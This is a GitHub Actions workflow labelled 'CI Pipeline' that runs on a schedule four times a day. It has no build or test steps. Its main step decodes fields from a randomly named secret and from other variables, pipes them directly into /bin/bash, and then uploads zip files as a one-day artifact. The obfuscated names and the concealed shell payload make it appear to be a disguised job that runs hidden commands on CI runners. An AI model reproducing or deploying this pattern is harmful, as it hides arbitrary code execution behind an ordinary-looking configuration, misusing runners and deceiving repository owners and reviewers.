name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '54 3,9,15,21 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          xqet3801: ${{ secrets.xqet3801 }}
        run: |
          printf '%s' "$xqet3801" | jq -r .gp58622 | /bin/bash
          echo $up113 | jq -r .sbej62375 | /bin/bash
          echo $kxbi01 | jq -r .r34 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: wJfJ3X3x
          path: "*.zip"
          retention-days: 1
